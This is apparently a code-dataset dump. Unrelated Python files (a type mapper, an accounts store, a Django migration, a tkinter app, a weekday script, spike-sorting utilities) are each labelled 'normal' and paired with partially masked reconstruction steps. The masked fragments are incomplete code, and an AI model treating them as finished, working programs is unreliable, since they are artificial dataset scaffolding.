            "int32_t": (VariableType.int32, 4),
            "float": (VariableType.float, 4),
            "double": (VariableType.double, 4),
            "bool": (VariableType.bool, 1)
        }
        self.type, self.size = switcher.get(variable_type, (VariableType.custom, None))
normal
{ "blob_id": "434ec7791345ad869d8ce86aa1cdc08344203171", "index": 2028, "step-1": "<mask token>\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-2": "<mask token>\n\n\nclass VariableType(Enum):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-3": "<mask token>\n\n\nclass VariableType(Enum):\n uint8 = 'uint8',\n int8 = 'int8'\n uint16 = 'uint16'\n int16 = 'int16'\n uint32 = 'uint32'\n int32 = 'int32'\n float = 'float'\n double = 'double'\n bool = 'bool'\n custom = 'custom'\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': (VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-4": "from enum import Enum\n\n\nclass VariableType(Enum):\n uint8 = 'uint8',\n int8 = 'int8'\n uint16 = 'uint16'\n int16 = 'int16'\n uint32 = 'uint32'\n int32 = 'int32'\n float = 'float'\n double = 'double'\n bool = 'bool'\n custom = 'custom'\n\n\nclass Variable:\n\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return 'VariableDto name=' + self.name + ' type=' + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n switcher = {'uint8_t': (VariableType.uint8, 1), 'int8_t': (\n VariableType.int8, 1), 'uint16_t': (VariableType.uint16, 2),\n 'int16_t': (VariableType.int16, 2), 'uint32_t': (VariableType.\n uint32, 4), 'int32_t': 
(VariableType.int32, 4), 'float': (\n VariableType.float, 4), 'double': (VariableType.double, 4),\n 'bool': (VariableType.bool, 1)}\n self.type, self.size = switcher.get(variable_type, (VariableType.\n custom, None))\n", "step-5": "from enum import Enum\n\n\nclass VariableType(Enum):\n uint8 = \"uint8\",\n int8 = \"int8\"\n\n uint16 = \"uint16\"\n int16 = \"int16\"\n\n uint32 = \"uint32\"\n int32 = \"int32\"\n\n float = \"float\"\n double = \"double\"\n bool = \"bool\"\n\n custom = \"custom\"\n\n\nclass Variable:\n def __init__(self, type_str: str, name: str):\n self.original_type = type_str\n self.__map_variable_type(type_str)\n self.name = name\n\n def __str__(self):\n return \"VariableDto name=\" + self.name + \" type=\" + str(self.type.name)\n\n def __map_variable_type(self, variable_type):\n # TODO add support for short, int, etc.\n switcher = {\n \"uint8_t\": (VariableType.uint8, 1),\n \"int8_t\": (VariableType.int8, 1),\n \"uint16_t\": (VariableType.uint16, 2),\n \"int16_t\": (VariableType.int16, 2),\n \"uint32_t\": (VariableType.uint32, 4),\n \"int32_t\": (VariableType.int32, 4),\n \"float\": (VariableType.float, 4),\n \"double\": (VariableType.double, 4),\n \"bool\": (VariableType.bool, 1)\n }\n self.type, self.size = switcher.get(variable_type, (VariableType.custom, None))\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
from app.exceptions import UserAlreadyExist, UserDoesNotExist

class Accounts(object):
    """ Creates an Account where users can be stored """

    def __init__(self):
        self.users = {}

    def add_user(self, user):
        if user.id in self.users:
            raise UserAlreadyExist
        else:
            self.users.update({user.id: user})

    def remove_user(self, email):
        """This Method removes a user from users dictonary using his/her
        unique email"""
        try:
            self.users.pop(email)
        except KeyError:
            raise UserDoesNotExist

    def check_user(self, email):
        if email in self.users:
            return self.users[email]

    def all_users(self):
        return self.users
normal
{ "blob_id": "88cc4ae4137cf9c0e9c39874b36f7a2770550f96", "index": 5431, "step-1": "<mask token>\n\n\nclass Accounts(object):\n <mask token>\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n <mask token>\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Accounts(object):\n <mask token>\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n <mask token>\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users\n", "step-3": "<mask token>\n\n\nclass Accounts(object):\n <mask token>\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n\n def remove_user(self, email):\n \"\"\"This Method removes a user from users dictonary using his/her\n unique email\"\"\"\n try:\n self.users.pop(email)\n except KeyError:\n raise UserDoesNotExist\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users\n", "step-4": "<mask token>\n\n\nclass Accounts(object):\n \"\"\" Creates an Account where users can be stored \"\"\"\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n\n def remove_user(self, email):\n \"\"\"This Method removes a user from users dictonary using his/her\n unique email\"\"\"\n try:\n self.users.pop(email)\n except KeyError:\n raise UserDoesNotExist\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users\n", "step-5": "from app.exceptions import UserAlreadyExist, UserDoesNotExist\n\nclass Accounts(object):\n \"\"\" Creates an Account where users can be stored \"\"\"\n\n def __init__(self):\n self.users = {}\n\n def add_user(self, user):\n if user.id in self.users:\n raise UserAlreadyExist\n else:\n self.users.update({user.id: user})\n \n def remove_user(self, email):\n \"\"\"This Method removes a user from users dictonary using his/her\n unique email\"\"\"\n try:\n self.users.pop(email)\n except KeyError:\n raise UserDoesNotExist\n\n def check_user(self, email):\n if email in self.users:\n return self.users[email]\n\n def all_users(self):\n return self.users", "step-ids": [ 4, 5, 6, 7, 9 ] }
[ 4, 5, 6, 7, 9 ]
# Generated by Django 3.0 on 2019-12-15 16:20

import datetime
from django.db import migrations, models
from django.utils.timezone import utc


class Migration(migrations.Migration):

    dependencies = [
        ('blog', '0013_auto_20191215_1619'),
    ]

    operations = [
        migrations.AlterField(
            model_name='categorie',
            name='utimestamp',
            field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='post',
            name='create_date',
            field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 657811, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='tag',
            name='utimestamp',
            field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)),
        ),
    ]
normal
{ "blob_id": "38a79f5b3ce1beb3dc1758880d42ceabc800ece7", "index": 8818, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0013_auto_20191215_1619')]\n operations = [migrations.AlterField(model_name='categorie', name=\n 'utimestamp', field=models.DateTimeField(default=datetime.datetime(\n 2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc))), migrations.\n AlterField(model_name='post', name='create_date', field=models.\n DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, \n 657811, tzinfo=utc))), migrations.AlterField(model_name='tag', name\n ='utimestamp', field=models.DateTimeField(default=datetime.datetime\n (2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)))]\n", "step-4": "import datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0013_auto_20191215_1619')]\n operations = [migrations.AlterField(model_name='categorie', name=\n 'utimestamp', field=models.DateTimeField(default=datetime.datetime(\n 2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc))), migrations.\n AlterField(model_name='post', name='create_date', field=models.\n DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, \n 657811, tzinfo=utc))), migrations.AlterField(model_name='tag', name\n ='utimestamp', field=models.DateTimeField(default=datetime.datetime\n (2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)))]\n", "step-5": "# Generated by Django 3.0 on 2019-12-15 16:20\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0013_auto_20191215_1619'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='categorie',\n name='utimestamp',\n field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 660603, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='post',\n name='create_date',\n field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 657811, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='tag',\n name='utimestamp',\n field=models.DateTimeField(default=datetime.datetime(2019, 12, 15, 16, 20, 14, 663436, tzinfo=utc)),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from tkinter import *
from tkinter import messagebox as mb
from tkinter.scrolledtext import ScrolledText
from tkinter import filedialog as fd
from child_window import ChildWindow
# from PIL import Image as PilImage
# from PIL import ImageTk, ImageOps


class Window:
    def __init__(self, width, height, title="MyWindow", resizable=(False, False), icon=r"resources/feather.ico"):
        self.root = Tk()
        self.root.title(title)
        # self.root.geometry(f"{width}x{height}+200+200")
        self.root.geometry("+600+300")
        # self.root.resizable(resizable[0], resizable[1])
        if icon:
            self.root.iconbitmap(icon)

        self.text = ScrolledText(self.root)

    def run(self):
        self.draw_widgets()
        self.root.mainloop()

    def draw_widgets(self):
        self.draw_menu()
        self.text.pack()

    def draw_menu(self):
        menu_bar = Menu(self.root)

        file_menu = Menu(menu_bar, tearoff=0)
        file_menu.add_command(label="Открыть", command=self.open_file)
        file_menu.add_command(label="Сохранить как", command=self.save_file)
        file_menu.add_command(label="Отркыть папку", command=self.open_dir)
        file_menu.add_separator()
        file_menu.add_command(label="Выйти", command=self.exit)

        info_menu = Menu(menu_bar, tearoff=0)
        info_menu.add_command(label="О приложении", command=self.show_info)

        menu_bar.add_cascade(label="Файл", menu=file_menu)
        menu_bar.add_cascade(label="Справка", menu=info_menu)
        self.root.configure(menu=menu_bar)

    def open_file(self):
        # wanted_files = (
        #     ("IMAGES", "*.jpeg;*.png;*.gif"),
        #     ("TEXT files", "*.txt;*.log"),
        #     ("PY files", "*.py"),
        #     ("ALL", "*.*")
        # )
        #
        # file_name = fd.askopenfilename(initialdir="D:/", title="FIND A FILE", filetypes=wanted_files)
        # self.text.insert(END, f"Надо открыть файл: {file_name}\nСодержимое:\n")
        # if file_name:
        #     with open(file_name, "r") as f:
        #         self.text.insert(END, f.read())

        # file = fd.askopenfile()
        # self.text.insert(END, file.read())
        # file.close()

        file_names = fd.askopenfilenames()
        self.text.insert(END, str(file_names))

    def save_file(self):
        name = fd.asksaveasfilename(filetypes=(("TEXT files", "*.txt"), ("Py files", "*.py")))
        if name:
            self.text.insert(END, f"Сохранить файл по пути {name}\n")
            # with open(name, "w") as f:
            #     f.write("123")

        # file = fd.asksaveasfile()
        # file.write("123")
        # file.close()

    def open_dir(self):
        path = fd.askdirectory(mustexist=True)
        self.text.insert(END, f"Папка {path}\n")

    def show_info(self):
        mb.showinfo("Информация", "Лучшее графическое приложение на свете")

    def exit(self):
        choice = mb.askyesno("Quit", "Do you want to quit?")
        if choice:
            self.root.destroy()

    def create_child(self, width, height, title="Child", resizable=(False, False), icon=None):
        ChildWindow(self.root, width, height, title, resizable, icon)


if __name__ == "__main__":
    window = Window(500, 500, "TKINTER")
    # window.create_child(200, 100)
    window.run()
normal
{ "blob_id": "02d4e1ddb0b4cf75c9902e13263c5a80417de01b", "index": 6530, "step-1": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n <mask token>\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n <mask token>\n <mask token>\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n <mask token>\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n <mask token>\n\n def exit(self):\n choice = mb.askyesno('Quit', 'Do you want to quit?')\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, 
title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n <mask token>\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n\n def show_info(self):\n mb.showinfo('Информация', 'Лучшее графическое приложение на свете')\n\n def exit(self):\n choice = mb.askyesno('Quit', 'Do you want to quit?')\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass Window:\n\n def __init__(self, width, height, title='MyWindow', resizable=(False, \n False), icon='resources/feather.ico'):\n self.root = Tk()\n self.root.title(title)\n self.root.geometry('+600+300')\n if icon:\n self.root.iconbitmap(icon)\n self.text = ScrolledText(self.root)\n\n def run(self):\n self.draw_widgets()\n self.root.mainloop()\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label='Открыть', command=self.open_file)\n file_menu.add_command(label='Сохранить как', command=self.save_file)\n file_menu.add_command(label='Отркыть папку', command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label='Выйти', command=self.exit)\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label='О приложении', command=self.show_info)\n menu_bar.add_cascade(label='Файл', menu=file_menu)\n menu_bar.add_cascade(label='Справка', menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=(('TEXT files', '*.txt'), (\n 'Py files', '*.py')))\n if name:\n self.text.insert(END, f'Сохранить файл по пути {name}\\n')\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f'Папка {path}\\n')\n\n def show_info(self):\n mb.showinfo('Информация', 'Лучшее графическое приложение на свете')\n\n def exit(self):\n choice = mb.askyesno('Quit', 'Do you want to quit?')\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title='Child', resizable=(False, \n False), icon=None):\n 
ChildWindow(self.root, width, height, title, resizable, icon)\n\n\nif __name__ == '__main__':\n window = Window(500, 500, 'TKINTER')\n window.run()\n", "step-5": "from tkinter import *\nfrom tkinter import messagebox as mb\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter import filedialog as fd\nfrom child_window import ChildWindow\n# from PIL import Image as PilImage\n# from PIL import ImageTk, ImageOps\n\n\nclass Window:\n def __init__(self, width, height, title=\"MyWindow\", resizable=(False, False), icon=r\"resources/feather.ico\"):\n self.root = Tk()\n self.root.title(title)\n # self.root.geometry(f\"{width}x{height}+200+200\")\n self.root.geometry(\"+600+300\")\n # self.root.resizable(resizable[0], resizable[1])\n if icon:\n self.root.iconbitmap(icon)\n\n self.text = ScrolledText(self.root)\n\n def run(self):\n self.draw_widgets()\n self.root.mainloop()\n\n def draw_widgets(self):\n self.draw_menu()\n self.text.pack()\n\n def draw_menu(self):\n menu_bar = Menu(self.root)\n\n file_menu = Menu(menu_bar, tearoff=0)\n file_menu.add_command(label=\"Открыть\", command=self.open_file)\n file_menu.add_command(label=\"Сохранить как\", command=self.save_file)\n file_menu.add_command(label=\"Отркыть папку\", command=self.open_dir)\n file_menu.add_separator()\n file_menu.add_command(label=\"Выйти\", command=self.exit)\n\n info_menu = Menu(menu_bar, tearoff=0)\n info_menu.add_command(label=\"О приложении\", command=self.show_info)\n\n menu_bar.add_cascade(label=\"Файл\", menu=file_menu)\n menu_bar.add_cascade(label=\"Справка\", menu=info_menu)\n self.root.configure(menu=menu_bar)\n\n def open_file(self):\n # wanted_files = (\n # (\"IMAGES\", \"*.jpeg;*.png;*.gif\"),\n # (\"TEXT files\", \"*.txt;*.log\"),\n # (\"PY files\", \"*.py\"),\n # (\"ALL\", \"*.*\")\n # )\n #\n # file_name = fd.askopenfilename(initialdir=\"D:/\", title=\"FIND A FILE\", filetypes=wanted_files)\n # self.text.insert(END, f\"Надо открыть файл: {file_name}\\nСодержимое:\\n\")\n # if file_name:\n # with open(file_name, \"r\") as f:\n # self.text.insert(END, f.read())\n\n # file = fd.askopenfile()\n # self.text.insert(END, file.read())\n # file.close()\n\n file_names = fd.askopenfilenames()\n self.text.insert(END, str(file_names))\n\n def save_file(self):\n name = fd.asksaveasfilename(filetypes=((\"TEXT files\", \"*.txt\"), (\"Py files\", \"*.py\")))\n if name:\n self.text.insert(END, f\"Сохранить файл по пути {name}\\n\")\n # with open(name, \"w\") as f:\n # f.write(\"123\")\n\n # file = fd.asksaveasfile()\n # file.write(\"123\")\n # file.close()\n\n def open_dir(self):\n path = fd.askdirectory(mustexist=True)\n self.text.insert(END, f\"Папка {path}\\n\")\n\n def show_info(self):\n mb.showinfo(\"Информация\", \"Лучшее графическое приложение на свете\")\n\n def exit(self):\n choice = mb.askyesno(\"Quit\", \"Do you want to quit?\")\n if choice:\n self.root.destroy()\n\n def create_child(self, width, height, title=\"Child\", resizable=(False, False), icon=None):\n ChildWindow(self.root, width, height, title, resizable, icon)\n\n\nif __name__ == \"__main__\":\n window = Window(500, 500, \"TKINTER\")\n # window.create_child(200, 100)\n window.run()\n\n", "step-ids": [ 8, 9, 10, 12, 14 ] }
[ 8, 9, 10, 12, 14 ] }
[ 8, 9, 10, 12, 14 ]
weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'] i = input('Enter a day of the week and number of days: ').split() e = int(i[-1]) starting_point = weekdays.index(i[0]) a = e + starting_point - len(weekdays) print(weekdays[a])
normal
{ "blob_id": "5f7d05c642339ce0ab02a65ca41f9ee89c2faf57", "index": 4240, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(weekdays[a])\n", "step-3": "weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',\n 'Saturday', 'Sunday']\ni = input('Enter a day of the week and number of days: ').split()\ne = int(i[-1])\nstarting_point = weekdays.index(i[0])\na = e + starting_point - len(weekdays)\nprint(weekdays[a])\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import numpy as np import os # ---------------------------------------------------------------------------- # Common variables # shifting channels based on rules: # CH_SHIFT[rule_name] = {src_1_based_ch:new_1_based_ch} CH_SHIFT = {} CH_SHIFT[None] = None # for 1-to-1 cards CH_SHIFT['1to1'] = {} for ch1 in xrange(1, 49): CH_SHIFT['1to1'][ch1] = ch1 for ch1 in xrange(81, 129): CH_SHIFT['1to1'][ch1] = ch1 - 32 # for 20110720A: assign all 40 A channels to 1-40 # and all 70 M channels to 41-110 CH_SHIFT['20110720A'] = {1: 41, 2: 42, 3: 43, 4: 44, 5: 45, 6: 46, 7: 47, 8: 48, 9: 49, 10: 50, 11: 51, 12: 52, 13: 53, 14: 54, 15: 55, 16: 56, 17: 57, 18: 58, 19: 59, 20: 60, 21: 61, 22: 62, 23: 63, 24: 64, 25: 65, 26: 66, 27: 67, 28: 68, 29: 69, 30: 70, 31: 71, 32: 72, 33: 73, 34: 74, 35: 75, 44: 1, 45: 2, 46: 3, 47: 4, 48: 5, 49: 6, 50: 7, 51: 8, 52: 9, 53: 10, 54: 11, 55: 12, 56: 13, 57: 14, 58: 15, 59: 16, 60: 17, 61: 18, 62: 19, 63: 20, 64: 21, 65: 22, 66: 23, 67: 24, 68: 25, 69: 26, 70: 27, 71: 28, 72: 29, 73: 30, 74: 31, 75: 32, 76: 33, 77: 34, 78: 35, 79: 36, 80: 37, 81: 38, 82: 39, 83: 40, 94: 76, 95: 77, 96: 78, 97: 79, 98: 80, 99: 81, 100: 82, 101: 83, 102: 84, 103: 85, 104: 86, 105: 87, 106: 88, 107: 89, 108: 90, 109: 91, 110: 92, 111: 93, 112: 94, 113: 95, 114: 96, 115: 97, 116: 98, 117: 99, 118: 100, 119: 101, 120: 102, 121: 103, 122: 104, 123: 105, 124: 106, 125: 107, 126: 108, 127: 109, 128: 110} # ---------------------------------------------------------------------------- # Common functions def seq_search(iterable, target): """do sequential search""" for i, e in enumerate(iterable): if e != target: continue return i return None def sort_uniq(base, *args): """sort and remove duplicates based on `base` and apply on to `args`""" if len(args) == 0: return None res = [] # sort si = np.argsort(base) base = np.array(base[si]) for arg in args: res.append(np.array(arg[si])) # remove duplicates di = np.nonzero(np.diff(base) == 0)[0] si = list(set(range(len(base))) - set(list(di))) for i in xrange(len(res)): res[i] = np.array(res[i][si]) return res # ----------------------------------------------------------------------------- def parse_opts(opts0): """Parse the options in the command line. This somewhat archaic function mainly exists for backward-compatability.""" opts = {} # parse the stuff in "opts" for opt in opts0: parsed = opt.split('=') key = parsed[0].strip() if len(parsed) > 1: # OLD: cmd = parsed[1].strip() cmd = '='.join(parsed[1:]).strip() else: cmd = '' opts[key] = cmd return opts def parse_opts2(tokens, optpx='--', argparam=False): """A newer option parser. 
(from perf102)""" opts0 = [] args = [] n = len(optpx) for token in tokens: if token[:2] == optpx: opts0.append(token[n:]) else: if argparam: token = token.split('=') args.append(token) opts = parse_opts(opts0) return args, opts def parse_opts_adapter(tokens, delim, optpx='--', argparam=False): """Adapter to support both old- and new-style options""" if any([t.startswith(optpx) for t in tokens]): # new style args, opts = parse_opts2(tokens, optpx=optpx, argparam=argparam) else: # old style args = tokens[:delim] opts = parse_opts(tokens[delim:]) return args, opts def makeavail(sth, sth2idx, idx2sth, query=None): if sth not in sth2idx: if query is not None and not query(sth): return sth2idx[sth] = len(idx2sth) idx2sth.append(sth) def prep_files(flist, sep=',', extchk=True): flist = flist.split(sep) if flist[0][0] == '+': flist = [f.strip() for f in open(flist[0][1:]).readlines()] if extchk: assert all([os.path.exists(f) for f in flist]) return flist def prepare_save_dir(sav_dir): if sav_dir != '' and not os.path.exists(sav_dir): try: os.makedirs(sav_dir) # in massively-parallel env, it is possible that # the sav_dir is created after os.path.exists() check. # We just ignore if makedirs fails. except Exception: pass def detect_cpus(): # Linux, Unix and MacOS: if hasattr(os, "sysconf"): if 'SC_NPROCESSORS_ONLN' in os.sysconf_names: # Linux & Unix: ncpus = os.sysconf("SC_NPROCESSORS_ONLN") if isinstance(ncpus, int) and ncpus > 0: return ncpus else: # OSX: return int(os.popen2("sysctl -n hw.ncpu")[1].read()) # Windows: if 'NUMBER_OF_PROCESSORS' in os.environ: ncpus = int(os.environ["NUMBER_OF_PROCESSORS"]) if ncpus > 0: return ncpus return 1 # ----------------------------------------------------------------------------- # Peri-stimulus data extraction related N_PRE_PT = 11 SEARCH_RNG = [6, 16] T_REJECT = 10 N_REJECT = 50 def invalidate_artifacts(buf0, t_reject=T_REJECT, n_reject=N_REJECT, verbose=True): """If there are more than `N_REJET` spikes within `T_REJECT`us window, invalidate all of them. """ ti_all = [(b['timestamp'], i) for i, b in enumerate(buf0)] ti_all = sorted(ti_all) t_all = np.array([t[0] for t in ti_all]) i_all = [t[1] for t in ti_all] nb = len(buf0) ri = range(nb) i = 0 while i < nb - 1: ii = [] t0 = t_all[i] for j in xrange(i + 1, nb): if t_all[j] < t0 + t_reject: ii.append(j) else: break i = j if len(ii) < n_reject: continue for ix in ii: try: ri.remove(i_all[ix]) except ValueError: pass buf = [buf0[i] for i in ri] if verbose and len(buf) != nb: print '* Rejecting', nb - len(buf), 'spikes.' return buf def set_new_threshold(wavform, thr, n_pre=N_PRE_PT, rng=SEARCH_RNG, i_chg=20): """Set new threshold `thr`. If the `waveform` cannot pass `thr` returns None. The new waveform is re-aligned based on the steepest point. The returned new waveform has `n_pre` points before the alignment point. 
